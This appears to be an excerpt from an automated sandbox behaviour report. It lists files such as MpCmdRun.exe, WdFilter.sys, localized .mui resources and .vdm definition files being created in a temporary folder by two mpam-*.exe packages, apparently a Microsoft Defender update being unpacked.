Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mr-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\am-ET\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\as-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bg-BG\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\bs-Latn-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\quz-PE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCopyAccelerator.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpEvMsg.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mk-MK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\et-EE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpCmdRun.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gd-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ConfigSecurityPolicy.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Cyrl-BA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mt-MT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cy-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hi-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\af-ZA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\id-ID\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUxAgent.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pa-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ne-NP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lt-LT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ml-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ur-PK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpRtp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\az-Latn-AZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sr-Latn-RS\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\th-TH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES-valencia\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kk-KZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ca-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ar-SA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-TW\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fil-PH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sq-AL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ga-IE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\he-IL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpOAV.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\eu-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\is-IS\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fi-FI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\DefenderCSP.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-CA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lv-LV\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpAsDesc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\km-KH\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\uk-UA\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ProtectionManagement.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nb-NO\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\or-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to dropped file
